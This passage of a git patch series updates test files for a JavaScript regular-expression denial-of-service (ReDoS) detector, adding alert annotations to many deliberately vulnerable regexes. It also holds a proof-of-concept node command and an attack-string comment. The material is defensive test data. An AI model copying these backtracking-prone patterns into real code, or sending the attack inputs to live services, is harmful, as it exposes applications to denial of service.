/([^'("|')]*)("|')){1}|content\s*=\s*("|')(?[^'("|')]*)("|')|scheme\s*=\s*("|')(?[^'("|')]*)("|'))/g; /<\*?font # Match start of Font Tag (?(?=[^>]+color.*>) #IF\/THEN lookahead color in tag (.*?color\s*?[=|:]\s*?) # IF found THEN move ahead ('+\#*?[\w\s]*'+ # CAPTURE ColorName\/Hex |"+\#*?[\w\s]*"+ # single or double |\#*\w*\b) # or no quotes .*?> # & move to end of tag |.*?> # ELSE move to end of Tag ) # Close the If\/Then lookahead # Use Multiline and IgnoreCase # Replace the matches from RE with MatchEvaluator below: # if m.Groups(1).Value<>"" then # Return "" # else # Return "" # end if/g; /(?'openingTag'<) \s*? (?'tagName'\w+) # Once we've got the tagname, match zero # or more attribute sequences (\s*? # Atomic Grouping for efficiency (?> (?!=[\/\?]?>) # Lookahead so that we can fail quickly # match Attribute pieces (?'attribName'\w+) (?:\s* (?'attribSign'=) \s* ) (?'attribValue' (?:\'[^\']*\'|\"[^\"]*\"|[^ >]+) ) ) )* \s*? # Closing Tag can be either > or \/> (?'closeTag'[\/\?]?>)/g; /^#?(([fFcC0369])\2){3}$/g; /&(?![a-zA-Z]{2,6};|#[0-9]{3};)/g; -/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; +/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; // $ Alert[js/redos] /<[a-zA-Z][^>]*\son\w+=(\w+|'[^']*'|"[^"]*")[^>]*>/g; />(?:(?[^<]*))/g; /<[^>]*name[\s]*=[\s]*"?[^\w_]*"?[^>]*>/g; @@ -34,26 +34,26 @@ /<([^\s>]*)(\s[^<]*)>/g; /^[a-zA-Z_]{1}[a-zA-Z0-9_]+$/g; /[0][x][0-9a-fA-F]+/g; -/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; +/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; // $ Alert[js/redos] /%[\-\+0\s\#]{0,1}(\d+){0,1}(\.\d+){0,1}[hlI]{0,1}[cCdiouxXeEfgGnpsS]{1}/g; /^(Function|Sub)(\s+[\w]+)\([^\(\)]*\)/g; -/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; +/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; // $ Alert[js/redos] /^(?([^"']|"[^"]*")*)'(?.*)$/g; />(?:(?[^<]*))/g; /<[a-zA-Z][^>]*\son\w+=(\w+|'[^']*'|"[^"]*")[^>]*>/g; /<[^>]*name[\s]*=[\s]*"?[^\w_]*"?[^>]*>/g; /\/\*[\d\D]*?\*\//g; /^#?([a-f]|[A-F]|[0-9]){3}(([a-f]|[A-F]|[0-9]){3})?$/g; -/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; +/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; // $ Alert[js/redos] //g; /("[^"]*")|('[^\r]*)(\r\n)?/g; /(?'openingTag'<) \s*? (?'tagName'\w+) # Once we've got the tagname, match zero # or more attribute sequences (\s*? # Atomic Grouping for efficiency (?> (?!=[\/\?]?>) # Lookahead so that we can fail quickly # match Attribute pieces (?'attribName'\w+) (?:\s* (?'attribSign'=) \s* ) (?'attribValue' (?:\'[^\']*\'|\"[^\"]*\"|[^ >]+) ) ) )* \s*? # Closing Tag can be either > or \/> (?'closeTag'[\/\?]?>)/g; /&(?![a-zA-Z]{2,6};|#[0-9]{3};)/g; /^#?(([fFcC0369])\2){3}$/g; -/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; +/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; // $ Alert[js/redos] /[0][x][0-9a-fA-F]+/g; /%[\-\+0\s\#]{0,1}(\d+){0,1}(\.\d+){0,1}[hlI]{0,1}[cCdiouxXeEfgGnpsS]{1}/g; -/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; +/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; // $ Alert[js/redos] /^(Function|Sub)(\s+[\w]+)\([^\(\)]*\)/g; /^[a-zA-Z_]{1}[a-zA-Z0-9_]+$/g; /^[^<>`~!/@\#}$%:;)(_^{&*=|'+]+$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js index db1e10df7386..550fff9a1225 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js @@ -1,7 +1,7 @@ /^\d{3}\s?\d{3}$/g; /^([a-zA-Z0-9@*#]{8,15})$/g; /^(?=.*\d).{4,8}$/g; -/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g; +/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g; // $ Alert[js/redos] /((\(\d{3}\) ?)|(\d{3}-))?\d{3}-\d{4}/g; /^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$/g; /^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?!.*\s).{4,8}$/g; @@ -12,7 +12,7 @@ /[:]{1}[-~+o]?[)>]+/g; /^\d{5}(-\d{4})?$/g; /^([a-z0-9]{32})$/g; -/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; +/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; // $ Alert[js/redos] /\u00A3/g; /\u2122/g; /^[{|\(]?[0-9a-fA-F]{8}[-]?([0-9a-fA-F]{4}[-]?){3}[0-9a-fA-F]{12}[\)|}]?$/g; @@ -21,7 +21,7 @@ /^(([\w][\w\-\.]*)\.)?([\w][\w\-]+)(\.([\w][\w\.]*))?$/g; /^(eth[0-9]$)|(^eth[0-9]:[1-9]$)/g; /^((Fred|Wilma)\s+Flintstone|(Barney|Betty)\s+Rubble)$/g; -/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; +/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; // $ Alert[js/redos] /\u00A3/g; /^([a-z0-9]{32})$/g; /[:]{1}[-~+o]?[)>]+/g; @@ -76,7 +76,7 @@ /(AUX|PRN|NUL|COM\d|LPT\d)+\s*$/g; /^[a-zA-Z]{1,2}[0-9][0-9A-Za-z]{0,1} {0,1}[0-9][A-Za-z]{2}$/g; /\d{4}-?\d{4}-?\d{4}-?\d{4}/g; -/^(\/w|\/W|[^<>+?$%{}&])+$/g; +/^(\/w|\/W|[^<>+?$%{}&])+$/g; // $ Alert[js/redos] /([0-1][0-9]|2[0-3]):[0-5][0-9]/g; /([A-Zäöü0-9\/][^a-z\:\,\(\)]*[A-Zäöü0-9])($|[\.\:\,\;\)\-\ \+]|s\b)/g; /^[\u0081-\uFFFF]{1,}$/g; @@ -87,7 +87,7 @@ /^(?n:(?!-[\d\,]*K) (?!-((\d{1,3},)*((([3-9]\d\d|2[89]\d|27[4-9])\xB0C)|(((4[6-9]|[5-9]\d)\d)\xB0F)))) -?\d{1,3}(,\d{3})*(\xB0[CF]|K) )$/g; /^[+]447\d{9}$/g; /[1-2][0|9][0-9]{2}[0-1][0-9][0-3][0-9][-][0-9]{4}/g; -/^(([a-z])+.)+[A-Z]([a-z])+$/g; +/^(([a-z])+.)+[A-Z]([a-z])+$/g; // $ Alert[js/redos] /(?-i:\b\p{Lu}+\b)/g; /^(\d{5}((|-)-\d{4})?)|([A-Za-z]\d[A-Za-z][\s\.\-]?(|-)\d[A-Za-z]\d)|[A-Za-z]{1,2}\d{1,2}[A-Za-z]? \d[A-Za-z]{2}$/g; /(.*\.([wW][mM][aA])|([mM][pP][3])$)/g; @@ -120,7 +120,7 @@ /^(.|\n){0,16}$/g; /\p{N}/g; /^[a-zA-Z0-9]{1,20}$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /^[^#]([^ ]+ ){6}[^ ]+$/g; /^[AaWaKkNn][a-zA-Z]?[0-9][a-zA-Z]{1,3}$/g; /^[a-z]+[0-9]*[a-z]+$/g; @@ -139,13 +139,13 @@ /^[0-9]{2}[-][0-9]{2}[-][0-9]{2}$/g; /^\(?082|083|084|072\)?[\s-]?[\d]{3}[\s-]?[\d]{4}$/g; /(\{\\f\d*)\\([^;]+;)/g; -/^(\/w|\/W|[^<>+?$%{}&])+$/g; +/^(\/w|\/W|[^<>+?$%{}&])+$/g; // $ Alert[js/redos] /^\(\d{1,2}(\s\d{1,2}){1,2}\)\s(\d{1,2}(\s\d{1,2}){1,2})((-(\d{1,4})){0,1})$/g; /(("|')[a-z0-9\/\.\?\=\&]*(\.htm|\.asp|\.php|\.jsp)[a-z0-9\/\.\?\=\&]*("|'))|(href=*?[a-z0-9\/\.\?\=\&"']*)/g; /^]*)>(.*?(?=<\/a>))<\/a>$/g; /^[0-9A-Za-z_ ]+(.[jJ][pP][gG]|.[gG][iI][fF])$/g; /^(?(^00000(|-0000))|(\d{5}(|-\d{4})))$/g; -/\w?<\s?\/?[^\s>]+(\s+[^"'=]+(=("[^"]*")|('[^\']*')|([^\s"'>]*))?)*\s*\/?>/g; +/\w?<\s?\/?[^\s>]+(\s+[^"'=]+(=("[^"]*")|('[^\']*')|([^\s"'>]*))?)*\s*\/?>/g; // $ Alert[js/redos] /^([A-PR-UWYZ0-9][A-HK-Y0-9][AEHMNPRTVXY0-9]?[ABEHMNPRVWXY0-9]? {1,2}[0-9][ABD-HJLN-UW-Z]{2}|GIR 0AA)$/g; /^([ \u00c0-\u01ffa-zA-Z'])+$/g; /[^abc]/g; @@ -170,4 +170,4 @@ /(?-i:\b\p{Lu}+\b)/g; /^[+]447\d{9}$/g; /[1-2][0|9][0-9]{2}[0-1][0-9][0-3][0-9][-][0-9]{4}/g; -/^(([a-z])+.)+[A-Z]([a-z])+$/g; +/^(([a-z])+.)+[A-Z]([a-z])+$/g; // $ Alert[js/redos] diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js index 888f1f5fb7dc..f4ebd5b8de9e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/strings.js @@ -16,7 +16,7 @@ /^(?=[^\d_].*?\d)\w(\w|[!@#$%]){7,20}/g; /^([A-Z|a-z|&]{3}\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)(\w{2})([A|a|0-9]{1})$|^([A-Z|a-z]{4}\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)((\w{2})([A|a|0-9]{1})){0,3}$/g; /^((4\d{3})|(5[1-5]\d{2})|(6011))-?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$/g; -/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g; +/^[\.\wæøå-]+@([a-zæøå0-9]+([\.-]{0,1}[a-zæøå0-9]+|[a-zæøå0-9]?))+\.[a-z]{2,6}$/g; // $ Alert[js/redos] /"((\\")|[^"(\\")])+"/g; /<[^>]+>/g; /^(?n:(?(St\.\ )?(?-i:[A-Z]\'?\w+?\-?)+)(?\ (?i:([JS]R)|((X(X{1,2})?)?((I((I{1,2})|V|X)?)|(V(I{0,3})))?)))?,((?Dr|Prof|M(r?|(is)?)s)\ )?(?(?-i:[A-Z]\'?(\w+?|\.)\ ??){1,2})?(\ (?(?-i:[A-Z])(\'?\w+?|\.))){0,2})$/g; @@ -44,17 +44,17 @@ /^([4]{1})([0-9]{12,15})$/g; /^([34|37]{2})([0-9]{13})$/g; /^([A-Z]{3}\s?(\d{3}|\d{2}|d{1})\s?[A-Z])|([A-Z]\s?(\d{3}|\d{2}|\d{1})\s?[A-Z]{3})|(([A-HK-PRSVWY][A-HJ-PR-Y])\s?([0][2-9]|[1-9][0-9])\s?[A-HJ-PR-Z]{3})$/g; -/(\S*)+(\u007C)+(\S*)/g; +/(\S*)+(\u007C)+(\S*)/g; // $ Alert[js/redos] /([^\.\?\!]*)[\.\?\!]/g; /(\S+)\x20{2,}(?=\S+)/g; /^([6011]{4})([0-9]{12})$/g; /^([30|36|38]{2})([0-9]{12})$/g; /^(?!000)(?!666)(?[0-6]\d{2}|7(?:[0-6]\d|7[012]))([- ]?)(?!00)(?\d\d)\1(?!0000)(?\d{4})$/g; -/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?){1,63}(\.[a-z0-9]{2,7})+$/g; +/^([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?\.){0,}([a-z0-9]+([\-a-z0-9]*[a-z0-9]+)?){1,63}(\.[a-z0-9]{2,7})+$/g; // $ Alert[js/redos] /(NOT)?(\s*\(*)\s*(\w+)\s*(=|<>|<|>|LIKE|IN)\s*(\(([^\)]*)\)|'([^']*)'|(-?\d*\.?\d+))(\s*\)*\s*)(AND|OR)?/g; /^[0-9]{1,}(,[0-9]+){0,}$/g; /^(?!^(PRN|AUX|CLOCK\$|NUL|CON|COM\d|LPT\d|\..*)(\..+)?$)[^\x00-\x1f\\?*<>:\;|\"/]+$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /^([1-9]{1}[0-9]{3}[,]?)*([1-9]{1}[0-9]{3})$/g; /^(?=((0[1-9]0)|([1-7][1-7]\d)|(00[1-9])|(0[1-9][1-9]))-(?=(([1-9]0)|(0[1-9])|([1-9][1-9]))-(?=((\d{3}[1-9])$|([1-9]\d{3})$|(\d[1-9]\d{2})$|(\d{2}[1-9]\d)$))))/g; /(\b\w+\b)/g; @@ -78,7 +78,7 @@ /^(\d{4}-){3}\d{4}$|^(\d{4} ){3}\d{4}$|^\d{16}$/g; /^(?[^,]+),(?[^,]+),(?[^,]+)$/g; /^(([a-h,A-H,j-n,J-N,p-z,P-Z,0-9]{9})([a-h,A-H,j-n,J-N,p,P,r-t,R-T,v-z,V-Z,0-9])([a-h,A-H,j-n,J-N,p-z,P-Z,0-9])(\d{6}))$/g; -/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; +/(?s)(?:\e\[(?:(\d+);?)*([A-Za-z])(.*?))(?=\e\[|\z)/g; // $ Alert[js/redos] /(NOT)?(\s*\(*)\s*(\w+)\s*(=|<>|<|>|LIKE|IN)\s*(\(([^\)]*)\)|'([^']*)'|(-?\d*\.?\d+))(\s*\)*\s*)(AND|OR)?/g; /^[0-9]{1,}(,[0-9]+){0,}$/g; /^([4]{1})([0-9]{12,15})$/g; @@ -88,4 +88,4 @@ /([^\.\?\!]*)[\.\?\!]/g; /(\S+)\x20{2,}(?=\S+)/g; /^([A-Z]{3}\s?(\d{3}|\d{2}|d{1})\s?[A-Z])|([A-Z]\s?(\d{3}|\d{2}|\d{1})\s?[A-Z]{3})|(([A-HK-PRSVWY][A-HJ-PR-Y])\s?([0][2-9]|[1-9][0-9])\s?[A-HJ-PR-Z]{3})$/g; -/(\S*)+(\u007C)+(\S*)/g; +/(\S*)+(\u007C)+(\S*)/g; // $ Alert[js/redos] diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js index 90d83b56ad3d..29ce77334563 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/uri.js @@ -1,8 +1,8 @@ /^(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])$/g; /(http|ftp|https):\/\/[\w\-_]+(\.[\w\-_]+)+([\w\-\.,@?^=%&:/~\+#]*[\w\-\@?^=%&/~\+#])?/g; -/(?:(?http(?:s?)|ftp)(?:\:\/\/)) (?:(?\w+\:\w+)(?:\@))? (?[^/\r\n\:]+)? (?\:\d+)? (?(?:\/.*)*\/)? (?.*?\.(?\w{2,4}))? (?\??(?:\w+\=[^\#]+)(?:\&?\w+\=\w+)*)* (?\#.*)?/g; +/(?:(?http(?:s?)|ftp)(?:\:\/\/)) (?:(?\w+\:\w+)(?:\@))? (?[^/\r\n\:]+)? (?\:\d+)? (?(?:\/.*)*\/)? (?.*?\.(?\w{2,4}))? (?\??(?:\w+\=[^\#]+)(?:\&?\w+\=\w+)*)* (?\#.*)?/g; // $ Alert[js/redos] /^[^\\\/\?\*\"\'\>\<\:\|]*$/g; -/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g; +/^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w ]*.*))+\.(txt|TXT)$/g; // $ Alert[js/redos] /(?!\.)[a-z]{1,4}$/g; /^([a-zA-Z]\:) (\\{1}| ((\\{1}) [^\\] ([^/:*?<>"|]*(?|]?$/g; -/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g; +/^[a-z]+([a-z0-9-]*[a-z0-9]+)?(\.([a-z]+([a-z0-9-]*[a-z0-9]+)?)+)*$/g; // $ Alert[js/redos] /(.*?)<\/a>/g; /^[^\\\./:\*\?\"<>\|]{1}[^\\/:\*\?\"<>\|]{0,254}$/g; /^[a-zA-Z0-9]+([a-zA-Z0-9\-\.]+)?\.(aero|biz|com|coop|edu|gov|info|int|mil|museum|name|net|org|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly| ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk| pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr| st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zr|zw|AERO|BIZ|COM|COOP|EDU|GOV|INFO|INT|MIL|MUSEUM|NAME|NET|ORG|AC|/g; @@ -52,7 +52,7 @@ /9[0-9]/g; /([^\=&]+)(?|]?$/g; /^((\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5])\.(\d|\d\d|[0-1]\d\d|2[0-4]\d|25[0-5]))$/g; /((http\:\/\/|https\:\/\/|ftp\:\/\/)|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(\/[a-zA-Z0-9%:/-_\?\.'~]*)?/g; @@ -60,7 +60,7 @@ /^(ht|f)tp((?<=http)s)?:\/\/((?<=http:\/\/)www|(?<=https:\/\/)www|(?<=ftp:\/\/)ftp)\.(([a-z][0-9])|([0-9][a-z])|([a-z0-9][a-z0-9\-]{1,2}[a-z0-9])|([a-z0-9][a-z0-9\-](([a-z0-9\-][a-z0-9])|([a-z0-9][a-z0-9\-]))[a-z0-9\-]*[a-z0-9]))\.(co|me|org|ltd|plc|net|sch|ac|mod|nhs|police|gov)\.uk$/g; /^DOMAIN\\\w+$/g; /^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)*((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|localhost|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.(com|edu|gov|int|mil|net|org|biz|arpa|info|name|pro|aero|coop|museum|[a-zA-Z]{2}))(\:[0-9]+)*(\/($|[a-zA-Z0-9\.\,\?\'\\\+&%\$#\=~_\-]+))*$/g; -/^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)?((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.[a-zA-Z]{2,4})(\:[0-9]+)?(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$/g; +/^(http|https|ftp)\:\/\/([a-zA-Z0-9\.\-]+(\:[a-zA-Z0-9\.&%\$\-]+)*@)?((25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])|([a-zA-Z0-9\-]+\.)*[a-zA-Z0-9\-]+\.[a-zA-Z]{2,4})(\:[0-9]+)?(\/[^/][a-zA-Z0-9\.\,\?\'\\/\+&%\$#\=~_\-@]*)*$/g; // $ Alert[js/redos] /^\\{2}[\w-]+\\(([\w-][\w-\s]*[\w-]+[$$]?$)|([\w-][$$]?$))/g; /(^[a-zA-Z0-9]+:\/\/)/g; /^http:\/\/([a-zA-Z0-9_\-]+)([\.][a-zA-Z0-9_\-]+)+([/][a-zA-Z0-9\~\(\)_\-]*)+([\.][a-zA-Z0-9\(\)_\-]+)*$/g; From 607b184a7f9ec468e617a832541afb7465fe887a Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:58:15 +0100 Subject: [PATCH 042/115] JS: Fix a bug in test case --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 55b173b0f779..455db4f86e93 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -102,7 +102,7 @@ var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert -var bad26 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; +var fix25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; // OK - fixed version of bad25 var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert From 082e16b3d31f679eaf4a31ef0bf776cf76328a88 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:58:56 +0100 Subject: [PATCH 043/115] JS: More Alert comments in ReDoS/tst.js based on variable naming Again just trying to translate the original intent behind the test, without taking actual query results into account --- .../query-tests/Security/CWE-400/ReDoS/tst.js | 48 +++++++++---------- 1 file changed, 23 insertions(+), 25 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 455db4f86e93..735d45ea6cc1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -41,24 +41,22 @@ var good4 = /(\r\n|\r|\n)+/; // BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; -// NOT GOOD; attack: "a" + "[]".repeat(100) + ".b\n" // Adapted from Knockout (https://github.com/knockout/knockout), which is // licensed under the MIT license; see file knockout-LICENSE -var bad6 = 